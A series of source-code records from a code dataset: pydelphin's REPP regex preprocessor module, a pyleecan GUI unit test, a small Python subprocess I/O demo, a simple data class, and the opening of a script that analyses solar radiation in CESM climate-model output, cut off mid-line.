yield REPPResult(s, startmap, endmap)\n\n def tokenize(self, s, pattern=DEFAULT_TOKENIZER, active=None):\n logger.info('tokenize(%r, %r)', s, pattern)\n res = self.apply(s, active=active)\n return self.tokenize_result(res, pattern=pattern)\n\n def tokenize_result(self, result, pattern=DEFAULT_TOKENIZER):\n logger.info('tokenize_result(%r, %r)', result, pattern)\n tokens = [\n YYToken(id=i, start=i, end=(i + 1),\n lnk=Lnk.charspan(tok[0], tok[1]),\n form=tok[2])\n for i, tok in enumerate(_tokenize(result, pattern))\n ]\n return YYTokenLattice(tokens)\n\n\nclass REPPStep(NamedTuple):\n \"\"\"\n A single rule 
application in REPP.\n\n Attributes:\n input (str): input string (prior to application)\n output (str): output string (after application)\n operation: operation performed\n applied (bool): `True` if the rule was applied\n startmap (:py:class:`array`): integer array of start offsets\n endmap (:py:class:`array`): integer array of end offsets\n \"\"\"\n input: str\n output: str\n operation: _REPPOperation\n applied: bool\n startmap: array\n endmap: array\n\n\nclass _REPPRule(_REPPOperation):\n \"\"\"\n A REPP rewrite rule.\n\n The apply() method of this class works like re.sub() in Python's\n standard library, but it analyzes the replacement pattern in order\n to ensure that character positions in the resulting string can be\n traced back (as much as possible) to the original string.\n\n Args:\n pattern: the regular expression pattern to match\n replacement: the replacement template\n \"\"\"\n def __init__(self, pattern, replacement):\n self.pattern = pattern\n self.replacement = replacement\n self._re = _compile(pattern)\n\n groups, literals = parse_template(replacement, self._re)\n # if a literal is None then it has a group, so make this\n # easier to iterate over by making pairs of (literal, None) or\n # (None, group)\n group_map = dict(groups)\n self._segments = [(literal, group_map.get(i))\n for i, literal in enumerate(literals)]\n\n # Get \"trackable\" capture groups; i.e., those that are\n # transparent for characterization. For PET behavior, these\n # must appear in strictly increasing order with no gaps\n self._last_trackable = -1 # index of trackable segment, not group id\n last_trackable_group = 0\n for i, group in groups:\n if group == last_trackable_group + 1:\n self._last_trackable = i\n last_trackable_group = group\n else:\n break\n\n def __str__(self):\n return f'!{self.pattern}\\t\\t{self.replacement}'\n\n def _apply(self, s, active):\n logger.debug(' %s', self)\n\n ms = list(self._re.finditer(s))\n\n if ms:\n pos = 0 # current position in the original string\n shift = 0 # current original/target length difference\n parts = []\n smap = array('i', [0])\n emap = array('i', [0])\n\n for m in ms:\n start = m.start()\n if pos < start:\n _copy_part(s[pos:start], shift, parts, smap, emap)\n\n if self._segments:\n for literal, start, end, tracked in self._itersegments(m):\n if tracked:\n _copy_part(literal, shift, parts, smap, emap)\n else:\n width = end - start\n _insert_part(literal, width, shift, parts,\n smap, emap)\n shift += width - len(literal)\n else:\n # the replacement is empty (match is deleted)\n shift += m.end() - start\n\n pos = m.end()\n\n if pos < len(s):\n _copy_part(s[pos:], shift, parts, smap, emap)\n smap.append(shift)\n emap.append(shift - 1)\n o = ''.join(parts)\n applied = True\n\n else:\n o = s\n smap = _zeromap(o)\n emap = _zeromap(o)\n applied = False\n\n yield REPPStep(s, o, self, applied, smap, emap)\n\n def _itermatches(self, ms):\n \"\"\"Yield pairs of the last affected position and a match.\"\"\"\n last_pos = 0\n for m in ms:\n yield (last_pos, m)\n last_pos = m.end()\n\n def _itersegments(self, m):\n \"\"\"Yield tuples of (replacement, start, end, tracked).\"\"\"\n start = m.start()\n\n # first yield segments that might be trackable\n tracked = self._segments[:self._last_trackable + 1]\n if tracked:\n spans = {group: m.span(group)\n for literal, group in tracked\n if literal is None}\n end = m.start(1) # if literal before tracked group\n for literal, group in tracked:\n if literal is None:\n start, end = spans[group]\n yield (m.group(group), start, 
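The segment bookkeeping in _REPPRule.__init__ above leans on CPython's internal sre_parse.parse_template. A standalone illustration of what it returns; this internal helper moved in newer Python versions, so the import location is an assumption tied to the versions this module targets.

import re
from sre_parse import parse_template

pat = re.compile(r'(\w+)-(\w+)')
groups, literals = parse_template(r'\2_\1', pat)
print(groups)    # [(0, 2), (2, 1)]: (segment index, group number) pairs
print(literals)  # [None, '_', None]: None marks a slot filled by a group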
end, True)\n start = end\n if group + 1 in spans:\n end = spans[group + 1][0]\n else:\n yield (literal, start, end, False)\n\n # then group all remaining segments together\n remaining = self._segments[self._last_trackable + 1:]\n if remaining:\n literal = ''.join(\n m.group(group) if literal is None else literal\n for literal, group in remaining)\n yield (literal, start, m.end(), False)\n\n\nclass _REPPGroup(_REPPOperation):\n def __init__(self, operations=None, name=None):\n if operations is None:\n operations = []\n self.operations = operations\n self.name = name\n\n def __repr__(self):\n name = '(\"{}\") '.format(self.name) if self.name is not None else ''\n return '<{} object {}at {}>'.format(\n type(self).__name__, name, id(self)\n )\n\n def __str__(self):\n return 'Module {}'.format(self.name if self.name is not None else '')\n\n def _apply(self, s, active):\n o = s\n applied = False\n for operation in self.operations:\n for step in operation._apply(o, active):\n yield step\n o = step.output\n applied |= step.applied\n\n yield REPPStep(s, o, self, applied, _zeromap(o), _zeromap(o))\n\n\nclass _REPPGroupCall(_REPPOperation):\n def __init__(self, name, modules):\n self.name = name\n self.modules = modules\n\n def _apply(self, s, active):\n if active is not None and self.name in active:\n logger.info('>%s', self.name)\n yield from self.modules[self.name]._apply(s, active)\n logger.debug('>%s (done)', self.name)\n else:\n logger.debug('>%s (inactive)', self.name)\n\n\nclass _REPPIterativeGroup(_REPPGroup):\n def __str__(self):\n return f'Internal group #{self.name}'\n\n def _apply(self, s, active):\n logger.debug('>%s', self.name)\n o = s\n applied = False\n prev = None\n i = 0\n while prev != o:\n i += 1\n prev = o\n for operation in self.operations:\n for step in operation._apply(o, active):\n yield step\n o = step.output\n applied |= step.applied\n yield REPPStep(s, o, self, applied, _zeromap(o), _zeromap(o))\n logger.debug('>%s (done; iterated %d time(s))', self.name, i)\n\n\nclass REPP(object):\n \"\"\"\n A Regular Expression Pre-Processor (REPP).\n\n The normal way to create a new REPP is to read a .rpp file via the\n :meth:`from_file` classmethod. For REPPs that are defined in code,\n there is the :meth:`from_string` classmethod, which parses the same\n definitions but does not require file I/O. Both methods, as does\n the class's `__init__()` method, allow for pre-loaded and named\n external *modules* to be provided, which allow for external group\n calls (also see :meth:`from_file` or implicit module loading). 
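_REPPIterativeGroup above re-applies its operations until the string reaches a fixed point. The same idea in isolation, with plain re.sub standing in for a rule:

import re

def iterate_rule(s, pattern, repl):
    # Re-apply one rewrite until the string stops changing, mirroring the
    # 'while prev != o' loop above.
    prev = None
    while prev != s:
        prev, s = s, re.sub(pattern, repl, s)
    return s

print(iterate_rule('a,,,,,b', ',,', ','))  # -> 'a,b' after a few passes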
By\n default, all external submodules are deactivated, but they can be\n activated by adding the module names to *active* or, later, via the\n :meth:`activate` method.\n\n A third classmethod, :meth:`from_config`, reads a PET-style\n configuration file (e.g., `repp.set`) which may specify the\n available and active modules, and therefore does not take the\n *modules* and *active* parameters.\n\n Args:\n name (str, optional): the name assigned to this module\n modules (dict, optional): a mapping from identifiers to REPP\n modules\n active (iterable, optional): an iterable of default module\n activations\n \"\"\"\n\n def __init__(self, name=None, modules=None, active=None):\n self.info = None\n self.tokenize_pattern = None\n self.group = _REPPGroup(name=name)\n\n if modules is None:\n modules = []\n self.modules = dict(modules)\n self.active = set()\n if active is None:\n active = []\n for mod in active:\n self.activate(mod)\n\n @classmethod\n def from_config(cls, path, directory=None):\n \"\"\"\n Instantiate a REPP from a PET-style `.set` configuration file.\n\n The *path* parameter points to the configuration file.\n Submodules are loaded from *directory*. If *directory* is not\n given, it is the directory part of *path*.\n\n Args:\n path (str): the path to the REPP configuration file\n directory (str, optional): the directory in which to search\n for submodules\n \"\"\"\n path = Path(path).expanduser()\n if not path.is_file():\n raise REPPError(f'REPP config file not found: {path!s}')\n confdir = path.parent\n\n # TODO: can TDL parsing be repurposed for this variant?\n conf = path.read_text(encoding='utf-8')\n conf = re.sub(r';.*', '', conf).replace('\\n', ' ')\n m = re.search(\n r'repp-modules\\s*:=\\s*((?:[-\\w]+\\s+)*[-\\w]+)\\s*\\.', conf)\n t = re.search(\n r'repp-tokenizer\\s*:=\\s*([-\\w]+)\\s*\\.', conf)\n a = re.search(\n r'repp-calls\\s*:=\\s*((?:[-\\w]+\\s+)*[-\\w]+)\\s*\\.', conf)\n # f = re.search(\n # r'format\\s*:=\\s*(\\w+)\\s*\\.', conf)\n d = re.search(\n r'repp-directory\\s*:=\\s*(.*)\\.\\s*$', conf)\n\n if m is None:\n raise REPPError('repp-modules option must be set')\n if t is None:\n raise REPPError('repp-tokenizer option must be set')\n\n # mods = m.group(1).split()\n tok = t.group(1).strip()\n active = a.group(1).split() if a is not None else None\n # fmt = f.group(1).strip() if f is not None else None\n\n if directory is None:\n if d is not None:\n directory = d.group(1).strip(' \"')\n elif confdir.joinpath(tok + '.rpp').is_file():\n directory = confdir\n elif confdir.joinpath('rpp', tok + '.rpp').is_file():\n directory = confdir.joinpath('rpp')\n elif confdir.joinpath('../rpp', tok + '.rpp').is_file():\n directory = confdir.joinpath('../rpp')\n else:\n raise REPPError('Could not find a suitable REPP directory.')\n\n # ignore repp-modules and format?\n return REPP.from_file(\n directory.joinpath(tok + '.rpp'),\n directory=directory,\n active=active\n )\n\n @classmethod\n def from_file(cls, path, directory=None, modules=None, active=None):\n \"\"\"\n Instantiate a REPP from a `.rpp` file.\n\n The *path* parameter points to the top-level module. Submodules\n are loaded from *directory*. If *directory* is not given, it is\n the directory part of *path*.\n\n A REPP module may utilize external submodules, which may be\n defined in two ways. The first method is to map a module name\n to an instantiated REPP instance in *modules*. The second\n method assumes that an external group call `>abc` corresponds\n to a file `abc.rpp` in *directory* and loads that file. 
The\n second method only happens if the name (e.g., `abc`) does not\n appear in *modules*. Only one module may define a tokenization\n pattern.\n\n Args:\n path (str): the path to the base REPP file to load\n directory (str, optional): the directory in which to search\n for submodules\n modules (dict, optional): a mapping from identifiers to\n REPP modules\n active (iterable, optional): an iterable of default module\n activations\n \"\"\"\n path = Path(path).expanduser()\n if directory is not None:\n directory = Path(directory).expanduser()\n else:\n directory = path.parent\n name = path.with_suffix('').name\n lines = _repp_lines(path)\n r = cls(name=name, modules=modules, active=active)\n _parse_repp(lines, r, directory)\n return r\n\n @classmethod\n def from_string(cls, s, name=None, modules=None, active=None):\n \"\"\"\n Instantiate a REPP from a string.\n\n Args:\n name (str, optional): the name of the REPP module\n modules (dict, optional): a mapping from identifiers to\n REPP modules\n active (iterable, optional): an iterable of default module\n activations\n \"\"\"\n r = cls(name=name, modules=modules, active=active)\n _parse_repp(s.splitlines(), r, None)\n return r\n\n def activate(self, mod):\n \"\"\"\n Set external module *mod* to active.\n \"\"\"\n self.active.add(mod)\n\n def deactivate(self, mod):\n \"\"\"\n Set external module *mod* to inactive.\n \"\"\"\n if mod in self.active:\n self.active.remove(mod)\n\n def _apply(self, s, active):\n return self.group._apply(s, active)\n\n def apply(self, s, active=None):\n \"\"\"\n Apply the REPP's rewrite rules to the input string *s*.\n\n Args:\n s (str): the input string to process\n active (optional): a collection of external module names\n that may be applied if called\n Returns:\n a :class:`REPPResult` object containing the processed\n string and characterization maps\n \"\"\"\n if active is None:\n active = self.active\n return self.group.apply(s, active=active)\n\n def trace(self, s, active=None, verbose=False):\n \"\"\"\n Rewrite string *s* like `apply()`, but yield each rewrite step.\n\n Args:\n s (str): the input string to process\n active (optional): a collection of external module names\n that may be applied if called\n verbose (bool, optional): if `False`, only output rules or\n groups that matched the input\n Yields:\n a :class:`REPPStep` object for each intermediate rewrite\n step, and finally a :class:`REPPResult` object after\n the last rewrite\n \"\"\"\n if active is None:\n active = self.active\n return self.group.trace(s, active=active, verbose=verbose)\n\n def tokenize(self, s, pattern=None, active=None):\n \"\"\"\n Rewrite and tokenize the input string *s*.\n\n Args:\n s (str): the input string to process\n pattern (str, optional): the regular expression pattern on\n which to split tokens; defaults to `[ \\t]+`\n active (optional): a collection of external module names\n that may be applied if called\n Returns:\n a :class:`~delphin.tokens.YYTokenLattice` containing the\n tokens and their characterization information\n \"\"\"\n if pattern is None:\n if self.tokenize_pattern is None:\n pattern = DEFAULT_TOKENIZER\n else:\n pattern = self.tokenize_pattern\n if active is None:\n active = self.active\n return self.group.tokenize(s, pattern=pattern, active=active)\n\n def tokenize_result(self, result, pattern=DEFAULT_TOKENIZER):\n \"\"\"\n Tokenize the result of rule application.\n\n Args:\n result: a :class:`REPPResult` object\n pattern (str, optional): the regular expression pattern on\n which to split tokens; 
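A sketch of the external-module mechanism described in the from_file docstring above, using from_string so no files are needed; the module name and rule are invented.

from delphin import repp

sub = repp.REPP.from_string('!cat\tdog', name='swap')
main = repp.REPP.from_string('>swap', modules={'swap': sub}, active=['swap'])
print(main.apply('the cat sat').string)  # -> 'the dog sat'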
defaults to `[ \\t]+`\n Returns:\n a :class:`~delphin.tokens.YYTokenLattice` containing the\n tokens and their characterization information\n \"\"\"\n return self.group.tokenize_result(result, pattern=pattern)\n\n\ndef _compile(pattern):\n try:\n return re.compile(pattern)\n except re.error:\n if _regex_available and '[' in pattern or ']' in pattern:\n warnings.warn(\n 'Invalid regex in REPP; see warning log for details.',\n REPPWarning)\n logger.warn(\"Possible unescaped brackets in %r; \"\n \"attempting to parse in compatibility mode\",\n pattern)\n return re.compile(pattern, flags=re.V0)\n else:\n raise\n\n\ndef _zeromap(s):\n return array('i', [0] * (len(s) + 2))\n\n\ndef _mergemap(map1, map2):\n \"\"\"\n Positions in map2 have an integer indicating the relative shift to\n the equivalent position in map1. E.g., the i'th position in map2\n corresponds to the i + map2[i] position in map1.\n \"\"\"\n merged = array('i', [0] * len(map2))\n for i, shift in enumerate(map2):\n newshift = shift + map1[i + shift]\n merged[i] = newshift\n return merged\n\n\ndef _copy_part(s, shift, parts, smap, emap):\n parts.append(s)\n smap.extend([shift] * len(s))\n emap.extend([shift] * len(s))\n\n\ndef _insert_part(s, w, shift, parts, smap, emap):\n parts.append(s)\n a = shift\n b = a - len(s)\n smap.extend(range(a, b, -1))\n a = shift + w - 1\n b = a - len(s)\n emap.extend(range(a, b, -1))\n\n\ndef _tokenize(result, pattern):\n s, sm, em = result # unpack for efficiency in loop\n toks = []\n pos = 0\n for m in re.finditer(pattern, result.string):\n if pos < m.start():\n toks.append((pos + sm[pos + 1],\n m.start() + em[m.start()],\n s[pos:m.start()]))\n pos = m.end()\n if pos < len(s):\n toks.append((pos + sm[pos + 1],\n len(s) + em[len(s)],\n s[pos:]))\n return toks\n\n\ndef _repp_lines(path):\n if not path.is_file():\n raise REPPError(f'REPP file not found: {path!s}')\n return path.read_text(encoding='utf-8').splitlines()\n\n\ndef _parse_repp(lines, r, directory):\n ops = list(_parse_repp_group(lines, r, directory))\n if lines:\n raise REPPError('Unexpected termination; maybe the # operator '\n 'appeared without an internal group.')\n r.group.operations.extend(ops)\n\n\ndef _parse_repp_group(lines, r, directory):\n igs = {} # internal groups\n while lines:\n line = lines.pop(0)\n if line.startswith(';') or line.strip() == '':\n continue # skip comments and empty lines\n elif line[0] == '!':\n match = re.match(r'([^\\t]+)\\t+(.*)', line[1:])\n if match is None:\n raise REPPError(f'Invalid rewrite rule: {line}')\n yield _REPPRule(match.group(1), match.group(2))\n elif line[0] == '<':\n fn = directory.joinpath(line[1:].rstrip())\n lines = _repp_lines(fn) + lines\n elif line[0] == '>':\n modname = line[1:].rstrip()\n if modname.isdigit():\n if modname in igs:\n yield igs[modname]\n else:\n raise REPPError(\n 'Iterative group not defined: ' + modname\n )\n else:\n if modname not in r.modules:\n if directory is None:\n raise REPPError('Cannot implicitly load modules if '\n 'a directory is not given.')\n mod = REPP.from_file(\n directory.joinpath(modname + '.rpp'),\n directory=directory,\n modules=r.modules\n )\n r.modules[modname] = mod\n yield _REPPGroupCall(modname, r.modules)\n elif line[0] == '#':\n igname = line[1:].rstrip()\n if igname.isdigit():\n if igname in igs:\n raise REPPError(\n 'Internal group name already defined: ' + igname\n )\n igs[igname] = _REPPIterativeGroup(\n operations=list(\n _parse_repp_group(lines, r, directory)\n ),\n name=igname\n )\n elif igname == '':\n return\n else:\n raise 
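The shift-map composition in _mergemap above, worked by hand: position i of map2 refers to position i + map2[i] of map1, so the merged shift adds the two.

from array import array

map1 = array('i', [0, 0, 1, 1, 1])
map2 = array('i', [0, 1, 1, 0, 0])
merged = array('i', (s + map1[i + s] for i, s in enumerate(map2)))
print(list(merged))  # -> [0, 2, 2, 1, 1]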
REPPError('Invalid internal group name: ' + igname)\n elif line[0] == ':':\n if r.tokenize_pattern is not None:\n raise REPPError(\n 'Only one tokenization pattern (:) may be defined.'\n )\n r.tokenize_pattern = line[1:]\n elif line[0] == '@':\n if r.info is not None:\n raise REPPError(\n 'No more than one meta-info declaration (@) may be '\n 'defined.'\n )\n r.info = line[1:]\n else:\n raise REPPError(f'Invalid declaration: {line}')\n","sub_path":"delphin/repp.py","file_name":"repp.py","file_ext":"py","file_size_in_byte":24851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"491768994","text":"# -*- coding: utf-8 -*-\n\nimport sys\n\nfrom PySide2 import QtWidgets\nfrom PySide2.QtTest import QTest\nfrom numpy import pi\nfrom Tests.GUI import gui_option # Set unit as [m]\nfrom pyleecan.Classes.LamSlotMag import LamSlotMag\nfrom pyleecan.Classes.SlotM17 import SlotM17\nfrom pyleecan.GUI.Dialog.DMachineSetup.SMSlot.PMSlot17.PMSlot17 import PMSlot17\n\n\nimport pytest\n\n\nclass TestPMSlot17(object):\n \"\"\"Test that the widget PMSlot17 behave like it should\"\"\"\n\n def setup_method(self):\n self.test_obj = LamSlotMag(Rint=0.1, Rext=0.2)\n self.test_obj.slot = SlotM17(Zs=2)\n self.test_obj.magnet.Lmag = 0.12\n self.widget = PMSlot17(self.test_obj)\n\n @classmethod\n def setup_class(cls):\n \"\"\"Start the app for the test\"\"\"\n print(\"\\nStart Test TestPMSlot17\")\n if not QtWidgets.QApplication.instance():\n cls.app = QtWidgets.QApplication(sys.argv)\n else:\n cls.app = QtWidgets.QApplication.instance()\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Exit the app after the test\"\"\"\n cls.app.quit()\n\n def test_init(self):\n \"\"\"Check that the Widget spinbox initialise to the lamination value\"\"\"\n\n assert self.widget.lf_Lmag.value() == 0.12\n\n def test_set_Lmag(self):\n \"\"\"Check that the Widget allow to update Lmag\"\"\"\n # Check Unit\n assert self.widget.unit_Lmag.text() == \"[m]\"\n # Change value in GUI\n self.widget.lf_Lmag.clear()\n QTest.keyClicks(self.widget.lf_Lmag, \"0.34\")\n self.widget.lf_Lmag.editingFinished.emit() # To trigger the slot\n\n assert self.widget.lamination.magnet.Lmag == 0.34\n assert self.test_obj.magnet.Lmag == 0.34\n\n def test_check(self):\n \"\"\"Check that the check is working correctly\"\"\"\n self.test_obj = LamSlotMag(Rint=0.1, Rext=0.9)\n # p check\n self.test_obj.slot = SlotM17(Zs=4)\n self.widget = PMSlot17(self.test_obj)\n assert self.widget.check(self.test_obj) == \"SlotM17 must have p=1\"\n\n\nif __name__ == \"__main__\":\n a = TestPMSlot17()\n a.setup_class()\n a.setup_method()\n a.test_check()\n a.teardown_class()\n print(\"Done\")\n","sub_path":"Tests/GUI/Dialog/DMachineSetup/PMSlot/test_PMSlot17.py","file_name":"test_PMSlot17.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"643860650","text":"import subprocess\nimport threading\nimport time\n\ncmd = \"python cd.py\"\np = subprocess.Popen(cmd,\n\tshell=True,\n\tbufsize=64,\n\tstdin=subprocess.PIPE,\n\tstderr=subprocess.PIPE,\n\tstdout=subprocess.PIPE)\n\nreadBuffer = []\n\ndef readThread():\n\tprint(\"readThread start!\")\n\twhile True:\n\t\tline = p.stdout.readline().decode(\"utf-8\").rstrip()\n\t\tif (line != ''):\n\t\t\tprint(line)\n\t\t\treadBuffer.append(line)\n\t\telse:\n\t\t\ttime.sleep(1000)\n\nrT = threading.Thread(target = readThread)\nrT.start()\n\nwhile True:\n\ttry:\n\t\tp.stdin.write(bytes(str(5) + '\\n', 
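The subprocess demo that begins above keeps a reader thread and a polling loop. For a one-shot exchange, the same round trip can be done with communicate(), assuming the child script (cd.py, as in the demo) exits when its stdin reaches EOF.

import subprocess

proc = subprocess.Popen(
    ['python', 'cd.py'],  # same hypothetical child script as in the demo
    stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True)
out, _ = proc.communicate(input='5\n', timeout=10)
print(out)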
'utf-8'))\n\t\tp.stdin.flush()\n\t\ttime.sleep(1)\n\t\tprint(readBuffer)\n\t\treadBuffer = []\n\texcept:\n\t\tpass","sub_path":"Server/Demo/Demo_io/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501651192","text":"#diy.py\nclass Diy():\n def __init__(self, first_n, last_n, email, country_code, tel, github, discord_id, country_birth, country_loc, gender, motivation, coding_level, groups, extra):\n self.first_n = first_n\n self.last_n = last_n\n self.email = email\n self.country_code = country_code\n self.tel = tel\n self.github = github\n self.discord_id = discord_id\n self.country_birth = country_birth\n self.country_loc = country_loc\n self.gender = gender\n self.motivation = motivation\n self.coding_level= coding_level\n self.groups =groups\n self.extra = extra\n \n def my_print(self):\n for attr, value in self.__dict__.items():\n print(attr, \": \", value) \n\n\n \n\n\n","sub_path":"Others/SoC_weekly/soc-wk2-cert-Jessica-Sanchez/diy.py","file_name":"diy.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500648387","text":"#=====================================================\n# import modules\n#=====================================================\n# os\nimport os\n\n#import netCDF4\nfrom netCDF4 import Dataset as netcdf_dataset\n\n# cartopy\n#import cartopy.crs as ccrs\n#from cartopy.mpl.geoaxes import GeoAxes\n#from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter\n#from cartopy.util import add_cyclic_point\n\n# matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import AxesGrid\nimport matplotlib.colors as colors\nimport matplotlib.collections as collections\n\n# numpy\nimport numpy as np\n\n# scipy\nfrom scipy import stats\n\n# parameters\nfrom get_parameters import get_area_mean_min_max\n\n#--------------------\n# start here\n#--------------------\n\n# data path\nctl_name=\"CTL\" #os.environ[\"ctl_name\"]\nexp_name=\"TSIS\" #os.environ[\"exp_name\"]\nctl_pref=\"solar_CTL_cesm211_ETEST-f19_g17-ens0_5days\"\nexp_pref=\"solar_TSIS_cesm211_ETEST-f19_g17-ens0_5days\"\n\nfpath_ctl=\"/raid00/xianwen/data/cesm211_solar_exp/\"+ctl_pref+\"/\"\nfpath_exp=\"/raid00/xianwen/data/cesm211_solar_exp/\"+exp_pref+\"/\"\n \nfigure_name=\"fig3c_zonal_sfc_net_5day-diag_uv+vis_ANN_shaded\"\n#figure_name=\"fig3e_zonal_sfc_net_5day-diag_nir_ANN_shaded\"\nunits=r\"Wm$^-$$^2$\"\n\nvarnms_vis_dn=np.array([\"FSSDS13\",\"FSSDS12\",\"FSSDS11\",\"FSSDS10\",\"FSSDS09\"])\nvarnms_nir_dn=np.array([\"FSSDS08\",\"FSSDS07\",\"FSSDS06\",\"FSSDS05\",\"FSSDS04\",\\\n \"FSSDS03\",\"FSSDS02\",\"FSSDS01\",\"FSSDS14\"])\n\nvarnms_vis_up=np.array([\"FSSUS13\",\"FSSUS12\",\"FSSUS11\",\"FSSUS10\",\"FSSUS09\"])\nvarnms_nir_up=np.array([\"FSSUS08\",\"FSSUS07\",\"FSSUS06\",\"FSSUS05\",\"FSSUS04\",\\\n \"FSSUS03\",\"FSSUS02\",\"FSSUS01\",\"FSSUS14\"])\n\nnlat=np.int64(96)\nmeans_yby_ctl_dn=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_yby_exp_dn=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_ctl_dn=np.zeros((2,nlat)) #multi-year mean for each variable\nmeans_exp_dn=np.zeros((2,nlat)) #multi-year mean for each variable\ndiffs_dn=np.zeros((2,nlat)) #multi-year exp-ctl diff for each variable\ngm_yby_ctl_dn=np.zeros((2)) #year by year mean for each variable\ngm_yby_exp_dn=np.zeros((2)) #year by year mean for each 
variable\n\nmeans_yby_ctl_up=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_yby_exp_up=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_ctl_up=np.zeros((2,nlat)) #multi-year mean for each variable\nmeans_exp_up=np.zeros((2,nlat)) #multi-year mean for each variable\ndiffs_up=np.zeros((2,nlat)) #multi-year exp-ctl diff for each variable\ngm_yby_ctl_up=np.zeros((2)) #year by year mean for each variable\ngm_yby_exp_up=np.zeros((2)) #year by year mean for each variable\n\nmeans_yby_ctl_net=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_yby_exp_net=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_ctl_net=np.zeros((2,nlat)) #multi-year mean for each variable\nmeans_exp_net=np.zeros((2,nlat)) #multi-year mean for each variable\ndiffs_net=np.zeros((2,nlat)) #multi-year exp-ctl diff for each variable\ngm_yby_ctl_net=np.zeros((2)) #year by year mean for each variable\ngm_yby_exp_net=np.zeros((2)) #year by year mean for each variable\n\nmeans_yby_ctl_fice=np.zeros((nlat)) #year by year mean for each variable\nmeans_yby_exp_fice=np.zeros((nlat)) #year by year mean for each variable\n\n# open data file\nfctl=fpath_ctl+ctl_pref+\"_climo_ANN.nc\"\nfexp=fpath_exp+exp_pref+\"_climo_ANN.nc\"\nfile_ctl=netcdf_dataset(fctl,\"r\")\nfile_exp=netcdf_dataset(fexp,\"r\")\n\n# read lat and lon\nlat=file_ctl.variables[\"lat\"]\nlon=file_ctl.variables[\"lon\"]\n\ndtctl_fice=file_ctl.variables[\"ICEFRAC\"][0,:,:]\nmeans_yby_ctl_fice[:]= np.mean(dtctl_fice[:,:],axis=1)\n\n# read data and calculate mean/min/max\nfor vn in varnms_vis_dn:\n dtctl_dn=file_ctl.variables[vn][0,:,:]\n dtexp_dn=file_exp.variables[vn][0,:,:] \n means_yby_ctl_dn[0,:]= means_yby_ctl_dn[0,:] + np.mean(dtctl_dn[:,:],axis=1)\n means_yby_exp_dn[0,:]= means_yby_exp_dn[0,:] + np.mean(dtexp_dn[:,:],axis=1)\n gm_yby_ctl_dn[0]=gm_yby_ctl_dn[0]+get_area_mean_min_max(dtctl_dn[:,:],lat[:])[0]\n gm_yby_exp_dn[0]=gm_yby_exp_dn[0]+get_area_mean_min_max(dtexp_dn[:,:],lat[:])[0]\n\nfor vn in varnms_nir_dn:\n dtctl_dn=file_ctl.variables[vn][0,:,:]\n dtexp_dn=file_exp.variables[vn][0,:,:] \n means_yby_ctl_dn[1,:]= means_yby_ctl_dn[1,:] + np.mean(dtctl_dn[:,:],axis=1) #[0,:]\n means_yby_exp_dn[1,:]= means_yby_exp_dn[1,:] + np.mean(dtexp_dn[:,:],axis=1) #[0,:]\n gm_yby_ctl_dn[1]=gm_yby_ctl_dn[1]+get_area_mean_min_max(dtctl_dn[:,:],lat[:])[0]\n gm_yby_exp_dn[1]=gm_yby_exp_dn[1]+get_area_mean_min_max(dtexp_dn[:,:],lat[:])[0]\n\nfor vn in varnms_vis_up:\n dtctl_up=file_ctl.variables[vn][0,:,:]\n dtexp_up=file_exp.variables[vn][0,:,:] \n means_yby_ctl_up[0,:]= means_yby_ctl_up[0,:] + np.mean(dtctl_up[:,:],axis=1)\n means_yby_exp_up[0,:]= means_yby_exp_up[0,:] + np.mean(dtexp_up[:,:],axis=1)\n gm_yby_ctl_up[0]=gm_yby_ctl_up[0]+get_area_mean_min_max(dtctl_up[:,:],lat[:])[0]\n gm_yby_exp_up[0]=gm_yby_exp_up[0]+get_area_mean_min_max(dtexp_up[:,:],lat[:])[0]\n\nfor vn in varnms_nir_up:\n dtctl_up=file_ctl.variables[vn][0,:,:]\n dtexp_up=file_exp.variables[vn][0,:,:] \n means_yby_ctl_up[1,:]= means_yby_ctl_up[1,:] + np.mean(dtctl_up[:,:],axis=1) #[0,:]\n means_yby_exp_up[1,:]= means_yby_exp_up[1,:] + np.mean(dtexp_up[:,:],axis=1) #[0,:]\n gm_yby_ctl_up[1]=gm_yby_ctl_up[1]+get_area_mean_min_max(dtctl_up[:,:],lat[:])[0]\n 
gm_yby_exp_up[1]=gm_yby_exp_up[1]+get_area_mean_min_max(dtexp_up[:,:],lat[:])[0]\n\nmeans_yby_ctl_net[:,:]=means_yby_ctl_dn[:,:]-means_yby_ctl_up[:,:]\nmeans_yby_exp_net[:,:]=means_yby_exp_dn[:,:]-means_yby_exp_up[:,:]\ngm_yby_ctl_net[:]=gm_yby_ctl_dn[:]-gm_yby_ctl_up[:]\ngm_yby_exp_net[:]=gm_yby_exp_dn[:]-gm_yby_exp_up[:]\n\n# compute multi-year mean and 